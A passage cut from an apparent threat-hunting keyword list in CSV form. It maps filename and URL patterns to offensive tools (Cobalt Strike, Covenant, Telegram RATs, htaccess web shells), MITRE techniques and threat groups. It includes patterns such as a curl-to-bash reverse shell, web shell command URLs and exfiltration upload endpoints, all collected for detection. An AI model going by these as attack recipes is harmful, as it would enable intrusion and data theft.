APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,HTTP-Login.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*httpntlm.go*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*httpntlm.old*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*httppayload.bin*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,1,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*HttpProxyScan_Log4J2.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*http-redwarden*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*httprelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*httprelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*httprelayserver.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*httprelayserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*http-request-smuggler-all.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*https://*.*.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://*.brs.devtunnels.ms/*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,0,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://*.euw.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,0,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://*.screenconnect.com/Bin/*.exe*,greyware_tool_keyword,ScreenConnect,control remote servers - abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,screenconnect.com,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*https://*.sendspace.com/upload*,greyware_tool_keyword,sendspace.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://*.use.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,0,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://*/.htaccess?c=cmd*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*https://*/.htaccess?c=uname -a*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*https://*/releases/download/*/lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*https://*Microsoft.ActiveDirectory.Management.dll*,offensive_tool_keyword,powershell,redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed,T1110.001 - T1110.003 - T1110.004,TA0006,N/A,N/A,Credential Access,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1,1,1,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*https://0.0.0.0:1337*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*https://127.0.0.1:7443*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*https://127.0.0.1:7443*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*https://aka.ms/DevTunnelCliInstall*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,0,1,N/A,8,10,N/A,N/A,N/A,N/A -*https://amsi.fail/*,offensive_tool_keyword,amsi.fail,AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.,T1059.001 - T1562.001 - T1027.005,TA0002 - TA0005 - TA0008,N/A,N/A,Defense Evasion,https://amsi.fail/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://anonfiles.com/*/*,greyware_tool_keyword,anonfiles.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://anymailfinder.com/search/*,greyware_tool_keyword,anymailfinder,used by attackers to find informations about a company users,T1593 - T1596 - T1213,TA0009,N/A,N/A,Reconnaissance,https://anymailfinder.com,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://api.anonfiles.com/upload*,greyware_tool_keyword,anonfiles.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://api.dropboxapi.com/*,greyware_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,Dropbox API calls - Understanding your environment with the applications used and allowed will enhances the effectiveness of your hunt here,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*https://api.hunter.io/*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,1,N/A,N/A,10,N/A,N/A,N/A,N/A -*https://api.openai.com/v1/files*,greyware_tool_keyword,ratchatpt,C2 using openAI API,T1094 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://github.com/spartan-conseil/ratchatpt,0,1,risk of False positive,10,10,4,2,2023-06-09T12:39:00Z,2023-06-09T09:19:10Z -*https://api.telegram.org/bot*/sendMessage*,greyware_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*https://avred.r00ted.ch/upload*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*https://bashupload.com*,greyware_tool_keyword,bashupload.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://crackstation.net/*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*https://curlshell:* | bash,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*https://cyseclabs.com/exploits/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*https://dnsdumpster.com/*,offensive_tool_keyword,dnsdumpster,dns recon & research - find & lookup dns records,T1018 - T1596.001 - T1590.002,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://dnsdumpster.com/,1,1,N/A,7,10,N/A,N/A,N/A,N/A -*https://download.advanced-ip-scanner.com/download/files/*.exe*,greyware_tool_keyword,advanced-ip-scanner,The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA),T1595 - T1046,TA0007 - TA0011,N/A,Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9,Reconnaissance,https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://ffuf.io.fi*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*https://ffuf.io/FUZZ*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,1,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*https://file.io/*,greyware_tool_keyword,file.io,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://file.io/?title=*,greyware_tool_keyword,file.io,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://github.com/bitsadmin/*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*https://github-com.translate.goog/*,greyware_tool_keyword,translate.goog,accessing github through google translate (evasion) false positive risk,T1090.003,TA0005,N/A,N/A,Defense Evasion,https://*-com.translate.goog/*,0,1,N/A,1,3,N/A,N/A,N/A,N/A -*https://gitlab.com/kalilinux/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://hunter.io/*,greyware_tool_keyword,Hunter.io,used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business,T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://hunter.io/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://ipv4.myip.wtf/text*,greyware_tool_keyword,ipv4.myip.wtf,get public ip address. Used by disctopia-c2,T1016 - T1071.001,TA0005 - TA0002,N/A,N/A,Reconnaissance,https://github.com/3ct0s/disctopia-c2/blob/main/libraries/disctopia.py,1,1,greyware_tools high risks of false positives,N/A,10,321,89,2023-09-26T12:00:16Z,2022-01-02T22:03:10Z -*https://kali.download/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*https://localhost:7443/*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*https://matrix.org/_matrix/client/r0/rooms/*/send/m.room.message*,greyware_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,0,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*https://myexternalip.com/raw*,greyware_tool_keyword,myexternalip.com,return external ip address,T1046 - T1595 - T1595.001,TA0007 - TA0040,N/A,N/A,Reconnaissance,https://myexternalip.com/raw,1,1,False positives warning - used by some C2 projects but legitimate site,1,6,N/A,N/A,N/A,N/A -*https://pastebin.com/raw/fevFJe98*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*https://t.me/BotFather*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*https://t.me/machine1337*,offensive_tool_keyword,TelegramRAT,Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions,T1071.001 - T1105 - T1027,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/machine1337/TelegramRAT,1,1,N/A,10,10,198,35,2023-08-25T13:41:49Z,2023-06-30T10:59:55Z -*https://temp.sh/*/*,greyware_tool_keyword,temp.sh,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://temp.sh/upload*,greyware_tool_keyword,temp.sh,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://tempsend.com/*,greyware_tool_keyword,tempsend.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://tempsend.com/send*,greyware_tool_keyword,tempsend.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://textbin.net/raw/*,greyware_tool_keyword,textbin.net,textbin.net raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,textbin.net,1,1,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*https://tmpfiles.org/dl/*.exe*,greyware_tool_keyword,tmpfiles.org,download of an executable files from tmpfiles.org often used by ransomware groups,T1566.002 - T1192 - T1105,TA0001 - TA0002,N/A,N/A,Collection,N/A,1,1,greyware tool - risk of false positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://transfer.sh*,greyware_tool_keyword,transfer.sh,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Data Exfiltration,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://transfert-my-files.com/files/*,greyware_tool_keyword,transfert-my-files.com,Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims,T1567 - T1022 - T1074 - T1105,TA0011 - TA0009 - TA0010 - TA0008,N/A,N/A,Collection,https://twitter.com/mthcht/status/1660953897622544384,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*https://transfert-my-files.com/inc/upload.php*,greyware_tool_keyword,transfert-my-files.com,Interesting observation on the file-sharing platform 